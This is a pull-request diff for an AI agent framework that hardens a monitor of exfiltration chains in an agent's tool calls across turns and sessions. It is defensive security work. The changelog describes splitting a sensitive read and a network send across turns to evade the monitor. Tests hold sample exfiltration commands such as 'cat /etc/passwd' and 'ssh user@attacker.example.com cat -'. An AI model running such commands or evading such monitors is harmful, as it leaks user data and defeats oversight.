### PR TITLE
fix(security): close RiskChainAccumulator cross-turn and cross-session gaps

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -355,81 +355,86 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/).
   (`notify_completed_subagents`, `crates/zeph-core/src/agent/subagent_commands.rs`), which had
   no sanitization applied to the raw result text at all before this fix.
 
-- `zeph-tui`/`zeph-core`: a background sub-agent's (`/agent bg`) transcript view, opened
-  manually via the SubAgents sidebar (`a` → `j` → `Enter`), stalled indefinitely once the
-  sub-agent completed — no terminal state was ever rendered and the view never returned to
-  Main chat, even though the sidebar's own agent list emptied at the same moment (#6570).
-  `SubAgentManager::collect()` removes the finished agent from `mgr.statuses()` synchronously,
-  so `maybe_reload_transcript`'s reload trigger (which reads `metrics.sub_agents`) could never
-  observe the transition and fire once more. `Channel` gains a new
-  `notify_background_subagent_completed` method (default no-op), mirroring the existing
-  `notify_foreground_subagent_completed` used by the `/agent`-foreground and `/agent resume`
-  paths; `notify_completed_subagents` (`crates/zeph-core/src/agent/subagent_commands.rs`) now
-  calls it for every background sub-agent it collects, alongside the existing plain-text
-  completion notice. `TuiChannel` forwards this to a new `AgentEvent::BackgroundSubagentCompleted`
-  event; the TUI only acts on it when the completed id matches the subagent currently being
-  viewed, resetting `view_target` to Main and pushing a terminal completion/failure marker —
-  sub-agents not being viewed are unaffected, since their completion is already surfaced via
-  the existing plain-text notice in Main chat.
+- `zeph-tools`: `RiskChainAccumulator` fully cleared all recorded calls and its cumulative score
+  at every turn boundary (`reset()`, called from `Agent::begin_turn()`), so a multi-step attack
+  chain deliberately split across turns (e.g. `SensitiveRead` in turn N, `NetworkEgress` in turn
+  N+1 — the exact "read now, send later" bypass in #6561's repro) went completely undetected:
+  by the time the second call arrived, the first leg had already been forgotten. An earlier
+  version of this fix only wired `RiskChainAccumulator::new`'s `RiskSignalQueue` parameter to
+  `Some(queue)` instead of `None` — necessary but insufficient, since the queue is only ever
+  populated from *inside* the same `detect_chain()` match that already blocks locally; it never
+  received anything for a genuinely split chain either. The real fix: `reset()` is now
+  `advance_turn()` (`Agent::begin_turn()` updated to match) and no longer fully clears state —
+  it prunes calls older than a 3-turn cross-turn window and recomputes `cumulative_score` from
+  the calls that remain, so a chain whose legs land in different turns (within the window) is
+  still visible to the next `record()` call. This bounds the fix two ways: the turn-based window
+  limits how long a stale sensitive read stays "live" (so unrelated old activity can't combine
+  with new activity indefinitely), and the existing absolute call-count cap independently bounds
+  memory regardless of turn count. Added a regression test that explicitly calls `advance_turn()`
+  between the two legs (simulating a real turn boundary) and asserts the chain still fires and
+  the signal queue still receives it, plus a companion test proving the chain does NOT fire once
+  the first leg ages out of the window. Corrected `risk_chain.rs`'s module doc and this
+  CHANGELOG entry (an earlier draft of this fix — queue-wiring only — incorrectly claimed the
+  cross-turn case was already handled; it was not, and a tester caught the gap before merge).
+  Also fixed a self-DoS amplification the wider window introduced: once a chain fires, it can
+  keep matching on every subsequent `record()` call for as long as both legs remain in the
+  cross-turn window, and each match used to re-push the same signal code — security quantified
+  this as up to ~20×2.5 = 50 pushed into `TrajectorySentinel` from a single logical chain, enough
+  to force a session-wide Allow→Deny escalation from one detection. The accumulator now tracks
+  which pattern it has already signaled for the current live match and pushes once per
+  detection, clearing the marker as soon as the chain stops matching so a genuinely new future
+  occurrence still pushes. Added regression tests for both the dedup and the re-arm behavior.
 
-- `zeph-index`/`zeph-core`: two independent uncontrolled-recursion stack-overflow DoS bugs
-  (CWE-674) — `chunk_children` (`crates/zeph-index/src/chunker.rs`) recursed into AST child
-  nodes with no depth limit, and `collect_strings` (`crates/zeph-core/src/agent/tool_execution/
-  tool_call_dag.rs`) recursed over tool-call JSON `input` with no depth limit — either could
-  exhaust the native call stack and abort the whole process (uncatchably — a stack overflow
-  cannot be caught by `catch_unwind`, `Result`, or any async task boundary) on adversarially
-  deep input: a crafted source file placed in a watched/indexed project directory (#6551), or
-  a deeply nested tool-call `input` payload originating from LLM output influenced by untrusted
-  content, e.g. a prompt-injected web page or MCP result (#6554). Both functions now take an
-  explicit `depth: usize` parameter bounded by a module-level const (`MAX_CHUNK_DEPTH = 512`,
-  `MAX_JSON_DEPTH = 256`); at the bound, `chunk_children` emits the oversized subtree as a
-  single leaf chunk instead of recursing further, and `collect_strings` stops descending into
-  that branch — both degrade gracefully rather than crashing, and log a `tracing::warn!` when
-  the bound is hit so operators get a signal that adversarial nesting was encountered. Added 11
-  regression tests (4 chunker, 7 DAG walker) covering the depth boundary, graceful degradation
-  under attacker-scale nesting, and that nesting *depth* (not element count/width) is what's
-  bounded.
+- `zeph-core`: `RiskSignal::from_code` (the decoder for signal codes pushed through
+  `RiskSignalQueue`) had no explicit arms for codes `10`/`11` — `RiskChainAccumulator`'s
+  `exfil_read_then_send`/`cred_then_egress` confirmed multi-step attack chain signals — so both
+  fell through to the `VigilFlagged(Low)` fallback, `TrajectorySentinel`'s lowest weight tier
+  (0.3, the same as noisy `ToolFailure`). A confirmed chain fire is a high-confidence signal, not
+  a heuristic, and was near-inert once it reached `TrajectorySentinel`/MAGE regardless of the
+  #6561 fix above. Added explicit `ExfilReadThenSend`/`CredThenEgress` `RiskSignal` variants,
+  mapped from codes `10`/`11`, weighted at `2.5`/`2.0` respectively (top and second-highest
+  tiers, at or above `ExfiltrationRedaction`/`ToolPairTransition`, matching the relative severity
+  already encoded in `risk_chain.rs`'s own `chain_bonus` values). MAGE mapping intentionally
+  unchanged — spec 004-16's four signal classes are a fixed, spec-governed set; widening it is
+  out of scope here. Added a regression test asserting both new codes weight above the fallback
+  tier and at least as high as `ExfiltrationRedaction`.
 
-- `zeph-memory`: `GraphConfig::retrieval_strategy` (`bfs`/`astar`/`watercircles`/`beam_search`/
-  `hybrid`/`synapse`) was parsed, validated, and documented, but never consulted by the live
-  graph-recall path — every real entry point (CLI/ACP/daemon/serve) ran through
-  `ContextService::prepare_context` → `zeph-context`'s `fetch_graph_facts` →
-  `SemanticMemoryBackend::recall_graph_facts` → `SemanticMemory::recall_graph_view`, whose
-  strategy selection was a hardcoded boolean switch on `spreading_activation.enabled` (SYNAPSE
-  vs. BFS) with no knowledge of the other four variants (#6566). The only code that correctly
-  dispatched on all six variants (`zeph-agent-context::helpers::fetch_graph_facts_raw` and its
-  supporting chain) had zero production callers — a "wired in isolation, never connected"
-  defect. `zeph_common::memory::GraphRecallParams` gains a `retrieval_strategy`
-  (mirroring `zeph_config::memory::GraphRetrievalStrategy`), `beam_width`, and `ring_limit`
-  field; `zeph-context`'s `fetch_graph_facts` now maps the configured strategy through
-  (`spreading_activation.enabled` still force-overrides to `Synapse`), and
-  `SemanticMemoryBackend::recall_graph_facts` (`zeph-agent-context`, the only layer allowed to
-  see both `zeph-memory` and `zeph-context` interface types) dispatches to the matching
-  `SemanticMemory::recall_graph`/`recall_graph_astar`/`recall_graph_watercircles`/
-  `recall_graph_beam`/`recall_graph_activated` method, with `Hybrid` classifying the query first
-  via `classify_graph_strategy`. `ZoomIn`/`ZoomOut` `recall_view` enrichment (source-message
-  provenance, 1-hop neighbor expansion), previously only implemented inside
-  `SemanticMemory::recall_graph_view`, is preserved across all 6 strategies via a new shared
-  `SemanticMemory::enrich_recall_view` post-dispatch pass (extracted from `recall_graph_view`,
-  which now delegates to it) — `recall_graph_facts` runs it after whichever concrete method
-  produced the base fact set, so `memcot_config.recall_view = "zoom_in" | "zoom_out"` keeps
-  working regardless of `retrieval_strategy`. Removed the now-fully-dead `fetch_graph_facts`/
-  `fetch_graph_facts_raw` dispatch chain from `zeph-agent-context::helpers` (kept
-  `GRAPH_FACTS_PREFIX`, still used for stale-message stripping) and its 4 associated unit tests
-  in `zeph-core`, superseded by equivalent coverage in `zeph-context::assembler`'s own test
-  module plus new end-to-end regression tests proving `retrieval_strategy` actually changes
-  which `SemanticMemory` method is invoked and that view enrichment survives across strategies.
+- `zeph-tools`/`zeph`: `RiskChainAccumulator` was shared across every concurrent session in ACP
+  and `serve-sessions` — `wire_risk_chain` was called once per connection/server (on the shared
+  `ShellExecutor` baked into `SharedAgentDeps`/`ServeAgentDeps`'s base tool chain) and the
+  resulting `Arc` handed to every session built on top, even though the type's own contract
+  assumes one instance per agent turn/session (#6588). Under concurrent load, one session's
+  `begin_turn()` reset could wipe another session's mid-chain state (false negative), or two
+  sessions' independent shell activity could cross-combine into a spurious chain fire
+  (cross-tenant state bleed), worst for `serve-sessions` since it is genuinely multi-tenant.
+  `ShellExecutor` is now excluded from the shared base chain and rebuilt fresh per session in
+  `spawn_acp_agent` (`src/acp.rs`) and `agent_factory::build_agent_factory`
+  (`src/serve/agent_factory.rs`), each calling `wire_risk_chain` itself to get its own
+  `RiskChainAccumulator` wired to that session's own trajectory signal queue, composed as an
+  outer layer around the shared, session-independent rest of the tool chain (file/scrape/
+  diagnostics/time/MCP — safe to share, unlike shell). Expensive connection/server-scoped
+  ingredients (OS sandbox initialization, permission policy, audit logger, task supervisor) are
+  still built once and cheaply cloned into each session's fresh executor, so nothing is
+  re-initialized per session. Added `ShellExecutor::with_shared_policy` and
+  `ShellPolicyHandle::new_shared` (`zeph-tools`) so ACP's live `blocked_commands` hot-reload
+  still reaches every session's independent executor. Added
+  `agent_setup::build_shared_base_chain_without_shell` (mirrors `build_base_executor_chain`
+  minus the `shell` slot, used by ACP) and `zeph_config::tools::ShellConfig` now derives `Clone`
+  to support the per-session rebuild. Also fixed a regression this uncovered:
+  `assemble_serve_deps`'s eager capability-scope startup validation built its tool-id registry
+  from the now-shell-less base chain, which would have reintroduced the #6045/F1 `DeadPattern`
+  bug for any `builtin:bash` scope pattern; a throwaway validation-only `ShellExecutor` is now
+  composed into that registry build. `runner.rs`/`daemon.rs` are single-session-per-process, so
+  a shared `ShellExecutor` built once was already correct there — no change needed beyond the
+  #6561 queue wiring above.
 
-  **BREAKING**: deployments running default graph-memory config (`spreading_activation.enabled
-  = false`, `[memory.graph] retrieval_strategy` left unset/`"synapse"`) will now use SYNAPSE
-  spreading-activation recall (`recall_graph_activated`) instead of the previous — unintentional
-  — plain-BFS fallback (`recall_graph`): before this fix, `retrieval_strategy` was never read at
-  all, and the live path fell back to BFS purely because `spreading_activation`'s own params
-  were only built when `enabled = true`. `retrieval_strategy`'s documented default (`synapse`,
-  "preserves existing SYNAPSE spreading-activation behavior") now actually takes effect. To keep
-  the prior BFS-only behavior, explicitly set `retrieval_strategy = "bfs"` under `[memory.graph]`.
-  Spreading activation is more expensive per-recall than plain BFS; deployments sensitive to
-  graph-recall latency/cost should benchmark before upgrading or pin `retrieval_strategy = "bfs"`.
+- `zeph`: added end-to-end behavioral tests per entry point (`runner.rs`/`daemon.rs`/`acp.rs`/
+  `src/serve/agent_factory.rs`) that construct each entry point's real production
+  `ShellExecutor`/tool-executor chain and dispatch a chained `SensitiveRead -> NetworkEgress`
+  sequence through it, asserting the chain is actually blocked and the #6561 signal queue is
+  populated — proving both fixes above are live in each mode, not just that the shared helper
+  functions compile in isolation. Added companion tests for ACP and serve confirming two
+  concurrent sessions' `RiskChainAccumulator` state does not leak across sessions (#6589).
 
 - `zeph-core`: `handle_compress_context` (the `compress_context`/`request_compaction` tool path,
   `crates/zeph-core/src/agent/tool_execution/focus.rs`) appended the compression LLM's summary

--- a/crates/zeph-config/src/tools.rs
+++ b/crates/zeph-config/src/tools.rs
@@ -1024,7 +1024,7 @@ fn default_max_checkpoints() -> usize {
 }
 
 /// Shell-specific configuration: timeout, command blocklist, and allowlist overrides.
-#[derive(Debug, Deserialize, Serialize)]
+#[derive(Debug, Clone, Deserialize, Serialize)]
 #[allow(clippy::struct_excessive_bools)]
 pub struct ShellConfig {
     /// Shell command timeout in seconds. Default: `30`.

--- a/crates/zeph-core/src/agent/mod.rs
+++ b/crates/zeph-core/src/agent/mod.rs
@@ -1036,8 +1036,12 @@ impl<C: Channel> Agent<C> {
                 // keeps this in sync with `RiskSignal::from_code`, the single source of truth
                 // for the code-to-meaning table. Only the four spec-004-16 signal classes have a
                 // MAGE equivalent; the remaining RiskSignal variants (OutOfScope, PiiRedaction,
-                // ToolFailure, HighCallRate, UnusualReadVolume, ToolPairTransition, and
-                // VigilFlagged(Low)) are trajectory-only and intentionally not surfaced to MAGE.
+                // ToolFailure, HighCallRate, UnusualReadVolume, ToolPairTransition,
+                // ExfilReadThenSend, CredThenEgress, and VigilFlagged(Low)) are trajectory-only
+                // and intentionally not surfaced to MAGE (spec 004-16's four classes are a fixed
+                // set; widening MAGE's mapping is a separate, spec-governed change, not part of
+                // #6561/F2's scope, which only fixes these two signals' TrajectorySentinel
+                // weight).
                 let mage_signal: Option<(MageSignal, MageSev)> = match signal {
                     RiskSignal::PolicyDeny => Some((MageSignal::PolicyViolation, MageSev::Medium)),
                     RiskSignal::ExfiltrationRedaction => {
@@ -1100,9 +1104,11 @@ impl<C: Channel> Agent<C> {
         if let Some(ref sentinel) = self.services.security.shadow_sentinel {
             sentinel.advance_turn();
         }
-        // Reset per-turn risk chain state so scores don't bleed across turns.
+        // #6561: advance (not reset) the risk chain accumulator — it prunes calls older than
+        // its cross-turn window and recomputes the score, rather than fully clearing state, so
+        // a chain split across turns is still detected. See `RiskChainAccumulator::advance_turn`.
         if let Some(ref acc) = self.services.security.risk_chain_accumulator {
-            acc.reset();
+            acc.advance_turn();
         }
         // Publish updated risk level to the shared slot so PolicyGateExecutor can read it.
         let risk_level = self.services.security.trajectory.current_risk();

--- a/crates/zeph-core/src/agent/tests/mage_signal_mapping_tests.rs
+++ b/crates/zeph-core/src/agent/tests/mage_signal_mapping_tests.rs
@@ -87,7 +87,9 @@ fn begin_turn_maps_known_risk_codes_to_mage_signals() {
 /// surface to MAGE.
 #[test]
 fn begin_turn_no_mage_signal_for_trajectory_only_codes() {
-    for code in [3u8, 4, 5, 99] {
+    // 10/11 (ExfilReadThenSend/CredThenEgress, #6561/F2) are trajectory-only too — MAGE's
+    // mapping stays at the fixed spec 004-16 four-class set; widening it is out of scope.
+    for code in [3u8, 4, 5, 10, 11, 99] {
         let mut agent = make_agent_with_mage();
         drain_one_code(&mut agent, code);
 
@@ -129,9 +131,46 @@ fn risk_signal_from_code_matches_assumed_variants() {
     assert_eq!(RiskSignal::from_code(3), RiskSignal::OutOfScope);
     assert_eq!(RiskSignal::from_code(4), RiskSignal::PiiRedaction);
     assert_eq!(RiskSignal::from_code(5), RiskSignal::ToolFailure);
+    assert_eq!(RiskSignal::from_code(10), RiskSignal::ExfilReadThenSend);
+    assert_eq!(RiskSignal::from_code(11), RiskSignal::CredThenEgress);
     assert_eq!(
         RiskSignal::from_code(99),
         RiskSignal::VigilFlagged(VigilRiskLevel::Low)
+    );
+}
+
+/// Regression for F2 (found during #6561 rework review): codes `10`/`11` — pushed by
+/// `zeph-tools`'s `RiskChainAccumulator` when it confirms a multi-step attack chain — used to
+/// fall through `from_code`'s wildcard arm into `VigilFlagged(Low)`, the lowest weight tier
+/// (0.3, same as noisy `ToolFailure`), silently near-inert once ingested by
+/// `TrajectorySentinel`. A confirmed chain fire is a high-confidence signal and must weight at
+/// least as high as other confirmed-pattern signals (`ExfiltrationRedaction`/
+/// `ToolPairTransition`, both 2.0), not the low-confidence fallback tier.
+#[test]
+fn risk_chain_signal_codes_weight_above_fallback_tier() {
+    use crate::agent::trajectory::VigilRiskLevel;
+
+    let fallback_weight = RiskSignal::VigilFlagged(VigilRiskLevel::Low).default_weight();
+    let exfil_weight = RiskSignal::from_code(10).default_weight();
+    let cred_weight = RiskSignal::from_code(11).default_weight();
+
+    assert!(
+        exfil_weight > fallback_weight,
+        "exfil_read_then_send (code 10) must weight above the VigilFlagged(Low) fallback tier \
+         ({fallback_weight}), got {exfil_weight}"
+    );
+    assert!(
+        cred_weight > fallback_weight,
+        "cred_then_egress (code 11) must weight above the VigilFlagged(Low) fallback tier \
+         ({fallback_weight}), got {cred_weight}"
+    );
+    assert!(
+        exfil_weight >= RiskSignal::ExfiltrationRedaction.default_weight(),
+        "a confirmed exfil chain must weight at least as high as ExfiltrationRedaction"
+    );
+    assert!(
+        cred_weight >= RiskSignal::ExfiltrationRedaction.default_weight(),
+        "a confirmed cred-then-egress chain must weight at least as high as ExfiltrationRedaction"
     );
 }
 

--- a/crates/zeph-core/src/agent/trajectory.rs
+++ b/crates/zeph-core/src/agent/trajectory.rs
@@ -66,6 +66,12 @@ pub enum RiskSignal {
     UnusualReadVolume,
     /// A configured high-risk tool-pair transition occurred within K turns.
     ToolPairTransition,
+    /// `RiskChainAccumulator` (`zeph-tools`) confirmed a `SensitiveRead -> NetworkEgress`
+    /// multi-step attack chain (`exfil_read_then_send`, code `10`).
+    ExfilReadThenSend,
+    /// `RiskChainAccumulator` (`zeph-tools`) confirmed a `CredentialAccess -> NetworkEgress`
+    /// multi-step attack chain (`cred_then_egress`, code `11`).
+    CredThenEgress,
 }
 
 impl RiskSignal {
@@ -75,9 +81,14 @@ impl RiskSignal {
     #[must_use]
     pub fn default_weight(self) -> f32 {
         match self {
-            Self::VigilFlagged(VigilRiskLevel::High) => 2.5,
+            // `RiskChainAccumulator` chain fires are confirmed, high-confidence multi-step
+            // attack patterns (not heuristics), so they weight at least as high as VIGIL's
+            // highest-confidence tier and `ExfiltrationRedaction`/`ToolPairTransition` —
+            // exfil_read_then_send weights highest, matching its higher `chain_bonus`
+            // (0.5 vs 0.4) in `zeph-tools`'s `risk_chain.rs`.
+            Self::ExfilReadThenSend | Self::VigilFlagged(VigilRiskLevel::High) => 2.5,
+            Self::CredThenEgress | Self::ExfiltrationRedaction | Self::ToolPairTransition => 2.0,
             Self::VigilFlagged(VigilRiskLevel::Medium) => 1.0,
-            Self::ExfiltrationRedaction | Self::ToolPairTransition => 2.0,
             Self::PolicyDeny | Self::OutOfScope | Self::HighCallRate | Self::UnusualReadVolume => {
                 1.5
             }
@@ -99,6 +110,8 @@ impl RiskSignal {
     /// - `5` = `ToolFailure`
     /// - `6` = `VigilFlagged(Medium)`
     /// - `7` = `VigilFlagged(High)`
+    /// - `10` = `ExfilReadThenSend` (`RiskChainAccumulator`'s `exfil_read_then_send` chain)
+    /// - `11` = `CredThenEgress` (`RiskChainAccumulator`'s `cred_then_egress` chain)
     /// - anything else = `VigilFlagged(Low)` (fallback)
     #[must_use]
     pub fn from_code(code: u8) -> Self {
@@ -110,6 +123,8 @@ impl RiskSignal {
             5 => Self::ToolFailure,
             6 => Self::VigilFlagged(VigilRiskLevel::Medium),
             7 => Self::VigilFlagged(VigilRiskLevel::High),
+            10 => Self::ExfilReadThenSend,
+            11 => Self::CredThenEgress,
             _ => Self::VigilFlagged(VigilRiskLevel::Low),
         }
     }

--- a/crates/zeph-tools/src/risk_chain.rs
+++ b/crates/zeph-tools/src/risk_chain.rs
@@ -1,22 +1,38 @@
 // SPDX-FileCopyrightText: 2026 Andrei G <bug-ops>
 // SPDX-License-Identifier: MIT OR Apache-2.0
 
-//! Multi-step attack chain detection across tool calls within a single agent turn.
+//! Multi-step attack chain detection across tool calls, within a bounded recent-turn window.
 //!
 //! [`RiskChainAccumulator`] records each tool invocation and detects sequential
 //! patterns that individually appear harmless but together constitute an attack
 //! chain (e.g., read sensitive file → send to external server).
 //!
-//! # Integration with `RiskSignalQueue`
+//! # Cross-turn detection (#6561)
 //!
-//! When a chain fires, the accumulator optionally pushes a signal code into the
-//! [`RiskSignalQueue`] shared with the `TrajectorySentinel` in `zeph-core`.
-//! Signal codes `10` (`exfil_read_then_send`) and `11` (`cred_then_egress`) are
-//! reserved for chains defined in this module.
+//! A naive per-turn accumulator that fully clears its state at every turn boundary cannot
+//! catch a chain deliberately split across turns (e.g. a sensitive read in turn N, network
+//! egress in turn N+1 — the exact bypass reported in #6561): by the time the second call
+//! arrives, the first leg has already been forgotten. [`advance_turn`](RiskChainAccumulator::advance_turn)
+//! (called once per agent turn boundary) does NOT fully clear recorded calls — it prunes only
+//! calls older than a fixed number of turns and recomputes `cumulative_score` from the calls
+//! that remain, so a chain whose legs land in different turns (as long as both are still within
+//! the window) is still visible to the pattern-matching logic in the next
+//! [`record`](RiskChainAccumulator::record) call. This bounds the blast radius two ways: the
+//! turn-based window limits how long a stale sensitive read stays "live", and the absolute call
+//! count cap independently bounds tracked calls regardless of turn count.
 //!
-//! `RiskChainAccumulator` is authoritative for multi-step chain blocking.
-//! `TrajectoryRiskSlot` / `TrajectorySentinel` remain authoritative for
-//! cumulative global risk level across turns.
+//! When a chain fires, the accumulator also pushes a signal code into the [`RiskSignalQueue`]
+//! shared with the `TrajectorySentinel` in `zeph-core`, so the session-scoped cross-turn risk
+//! aggregate reflects the detection too — this is a secondary reporting channel, not the
+//! mechanism that makes cross-turn detection possible (the turn-windowed state above is). All
+//! production entry points construct this accumulator with `Some(queue)`; `None` is used only in
+//! isolated unit tests that don't need `TrajectorySentinel` reporting. Signal codes `10`
+//! (`exfil_read_then_send`) and `11` (`cred_then_egress`) are reserved for chains defined in this
+//! module.
+//!
+//! `RiskChainAccumulator` is authoritative for multi-step chain blocking within its recent-turn
+//! window. `TrajectoryRiskSlot` / `TrajectorySentinel` remain authoritative for cumulative global
+//! risk level across the whole session.
 
 use std::collections::VecDeque;
 use std::sync::Arc;
@@ -31,11 +47,20 @@ const SIGNAL_EXFIL_READ_THEN_SEND: u8 = 10;
 /// Signal code for `cred_then_egress` chain.
 const SIGNAL_CRED_THEN_EGRESS: u8 = 11;
 
-/// Maximum number of calls tracked per turn.
+/// Maximum number of calls tracked, regardless of how many turns they span.
 ///
-/// Once exceeded, the oldest entry is dropped while the cumulative score is
-/// preserved so blocking decisions remain accurate.
+/// Once exceeded, the oldest entry is dropped and `cumulative_score` is recomputed from the
+/// surviving calls (see [`RiskChainAccumulator::advance_turn`]).
 const MAX_CALLS: usize = 20;
+
+/// Number of turns a recorded call stays "live" for cross-turn chain detection (#6561).
+///
+/// [`RiskChainAccumulator::advance_turn`] prunes any call older than this many turns. A chain
+/// split across turns (e.g. sensitive read in turn N, network egress in turn N+1..=N+3) is still
+/// caught as long as both legs fall within this window; a read from many turns ago that never
+/// led anywhere eventually ages out, so unrelated old activity cannot combine with new activity
+/// into a false positive indefinitely.
+const CROSS_TURN_WINDOW_TURNS: u64 = 3;
 
 /// Risk categories assigned to individual tool calls during classification.
 #[derive(Debug, Clone, PartialEq, Eq)]
@@ -67,21 +92,38 @@ pub struct RiskChainVerdict {
 #[derive(Debug, Clone)]
 struct ScoredCall {
     tags: Vec<RiskTag>,
+    /// Turn index this call was recorded in — used by `advance_turn` to prune calls that have
+    /// aged out of [`CROSS_TURN_WINDOW_TURNS`].
+    turn: u64,
 }
 
 #[derive(Debug, Default)]
 struct Inner {
     calls: VecDeque<ScoredCall>,
     cumulative_score: f32,
+    /// Current turn index, incremented by `advance_turn`. Starts at 0.
+    turn: u64,
+    /// Name of the chain pattern currently pushed into the signal queue, if any (#6561
+    /// dedup fix). While the same chain stays matched across several subsequent `record()`
+    /// calls (it can remain live for up to `CROSS_TURN_WINDOW_TURNS` turns now), the queue
+    /// push must fire once per detection, not once per call — otherwise a single logical
+    /// chain can flood `RiskSignalQueue`/`TrajectorySentinel` with dozens of duplicate pushes
+    /// over its live window, amplifying one detection into a session-wide false escalation.
+    /// Cleared as soon as `detect_chain` stops matching, so a genuinely new occurrence of the
+    /// same pattern (after the old one ages out) pushes again.
+    signaled_pattern: Option<String>,
 }
 
-/// Per-turn cumulative risk tracker for multi-step attack chain detection.
+/// Cumulative risk tracker for multi-step attack chain detection, scoped to one agent
+/// session/turn-loop (#6588: one instance per session, not shared across concurrent sessions).
 ///
 /// Thread-safe: state is protected by a `parking_lot::Mutex` so concurrent
 /// tool calls within a single batch accumulate correctly.
 ///
-/// Create one instance per agent turn via [`RiskChainAccumulator::new`] and call
-/// [`reset`](RiskChainAccumulator::reset) at each turn boundary.
+/// Create one instance per agent session via [`RiskChainAccumulator::new`] and call
+/// [`advance_turn`](RiskChainAccumulator::advance_turn) at each turn boundary — this prunes
+/// stale calls rather than fully clearing state, which is what makes cross-turn chain
+/// detection possible (see the module docs).
 ///
 /// # Examples
 ///
@@ -99,7 +141,7 @@ pub struct RiskChainAccumulator {
 }
 
 impl RiskChainAccumulator {
-    /// Create a new accumulator for one agent turn.
+    /// Create a new accumulator for one agent session.
     ///
     /// `signal_queue` — when `Some`, chain detections push a signal code into
     /// the shared queue so the `TrajectorySentinel` in `zeph-core` is notified.
@@ -133,7 +175,11 @@ impl RiskChainAccumulator {
         if inner.calls.len() >= MAX_CALLS {
             inner.calls.pop_front();
         }
-        inner.calls.push_back(ScoredCall { tags: tags.clone() });
+        let turn = inner.turn;
+        inner.calls.push_back(ScoredCall {
+            tags: tags.clone(),
+            turn,
+        });
         inner.cumulative_score = (inner.cumulative_score + call_score).min(10.0);
 
         // Check for multi-step chain patterns.
@@ -143,11 +189,22 @@ impl RiskChainAccumulator {
             let bonus = chain_bonus(name);
             inner.cumulative_score = (inner.cumulative_score + bonus).min(10.0);
 
-            // Push into the shared signal queue.
-            if let Some(ref q) = self.signal_queue {
-                let code = chain_signal_code(name);
-                q.lock().push(code);
+            // Push into the shared signal queue — but only once per detection (#6561 dedup
+            // fix): the same live chain can keep matching on every subsequent call for up to
+            // CROSS_TURN_WINDOW_TURNS turns, and without this guard each of those calls would
+            // re-push the same signal code, flooding TrajectorySentinel/MAGE with duplicates
+            // from a single logical attack.
+            if inner.signaled_pattern.as_deref() != Some(name.as_str()) {
+                if let Some(ref q) = self.signal_queue {
+                    let code = chain_signal_code(name);
+                    q.lock().push(code);
+                }
+                inner.signaled_pattern = Some(name.clone());
             }
+        } else {
+            // Chain no longer live (a leg aged out of the window) — clear the dedup marker so
+            // a genuinely new future occurrence of the same pattern pushes again.
+            inner.signaled_pattern = None;
         }
 
         RiskChainVerdict {
@@ -157,11 +214,24 @@ impl RiskChainAccumulator {
         }
     }
 
-    /// Reset per-turn state. Call at each turn boundary.
-    pub fn reset(&self) {
+    /// Advance to the next turn. Call at each turn boundary (`Agent::begin_turn()`).
+    ///
+    /// Does NOT fully clear state — that would defeat cross-turn chain detection (#6561). Instead
+    /// it prunes calls older than a fixed number of turns and recomputes `cumulative_score`
+    /// from the calls that remain, so a chain split across turns is still visible to the next
+    /// [`record`](Self::record) call as long as both legs fall within the window.
+    pub fn advance_turn(&self) {
         let mut inner = self.inner.lock();
-        inner.calls.clear();
-        inner.cumulative_score = 0.0;
+        inner.turn += 1;
+        let cutoff = inner.turn.saturating_sub(CROSS_TURN_WINDOW_TURNS);
+        inner.calls.retain(|c| c.turn >= cutoff);
+        inner.cumulative_score = inner
+            .calls
+            .iter()
+            .flat_map(|c| &c.tags)
+            .map(tag_score)
+            .sum::<f32>()
+            .min(10.0);
     }
 
     /// Detect whether the accumulated call sequence matches a known chain pattern.
@@ -343,14 +413,75 @@ mod tests {
     }
 
     #[test]
-    fn reset_clears_state() {
+    fn advance_turn_eventually_clears_stale_calls() {
         let acc = RiskChainAccumulator::new(None);
         let _ = acc.record("bash", "cat /etc/passwd", 0.7);
         let _ = acc.record("bash", "curl http://evil.com", 0.7);
-        acc.reset();
+        // One call from now on, both calls are still within CROSS_TURN_WINDOW_TURNS.
+        for _ in 0..=CROSS_TURN_WINDOW_TURNS {
+            acc.advance_turn();
+        }
         let inner = acc.inner.lock();
-        assert_eq!(inner.calls.len(), 0);
+        assert_eq!(
+            inner.calls.len(),
+            0,
+            "calls recorded before the window should eventually age out"
+        );
         assert!(inner.cumulative_score.abs() < f32::EPSILON);
+    }
+
+    /// Regression test for #6561: a chain split across a real turn boundary — one leg recorded,
+    /// `advance_turn()` called (simulating `Agent::begin_turn()`), then the other leg recorded —
+    /// must still be caught. Before this fix, `advance_turn` (then named `reset`) fully cleared
+    /// `calls`, so the second leg's `detect_chain` call never saw the first leg and the chain
+    /// went completely undetected — the exact "read now, send later" bypass from the issue.
+    #[test]
+    fn chain_split_across_turn_boundary_still_detected() {
+        let queue: RiskSignalQueue = Arc::new(Mutex::new(Vec::new()));
+        let acc = RiskChainAccumulator::new(Some(queue.clone()));
+
+        // Turn N: sensitive read alone — must not block or fire a chain yet.
+        let first = acc.record("bash", "cat /etc/passwd", 0.7);
+        assert!(!first.should_block);
+        assert!(first.chain_pattern.is_none());
+        assert!(
+            queue.lock().is_empty(),
+            "a lone sensitive read must not push a signal"
+        );
+
+        // Simulate the real turn boundary (`Agent::begin_turn()` calls this).
+        acc.advance_turn();
+
+        // Turn N+1: network egress — the read from turn N must still be visible.
+        let second = acc.record("bash", "ssh user@attacker.example.com cat -", 0.7);
+        assert_eq!(
+            second.chain_pattern.as_deref(),
+            Some("exfil_read_then_send"),
+            "the chain must still fire even though its legs landed in different turns"
+        );
+        assert!(second.should_block);
+        assert!(
+            queue.lock().contains(&SIGNAL_EXFIL_READ_THEN_SEND),
+            "the cross-turn chain detection must still push the signal code"
+        );
+    }
+
+    /// Companion to the above: once a sensitive read ages out of `CROSS_TURN_WINDOW_TURNS`, a
+    /// later, otherwise-unrelated network egress call must NOT be flagged — the window bounds
+    /// how long stale activity can combine with new activity, so this isn't unbounded.
+    #[test]
+    fn chain_does_not_fire_once_first_leg_ages_out_of_window() {
+        let acc = RiskChainAccumulator::new(None);
+        let _ = acc.record("bash", "cat /etc/passwd", 0.7);
+        // Advance past the window without ever recording the second leg.
+        for _ in 0..=CROSS_TURN_WINDOW_TURNS {
+            acc.advance_turn();
+        }
+        let v = acc.record("bash", "ssh user@attacker.example.com cat -", 0.7);
+        assert!(
+            v.chain_pattern.is_none(),
+            "a sensitive read from beyond the cross-turn window must not combine with new egress"
+        );
     }
 
     #[test]
@@ -370,6 +501,78 @@ mod tests {
         let _ = acc.record("bash", "curl http://evil.com", 0.7);
         let signals = queue.lock();
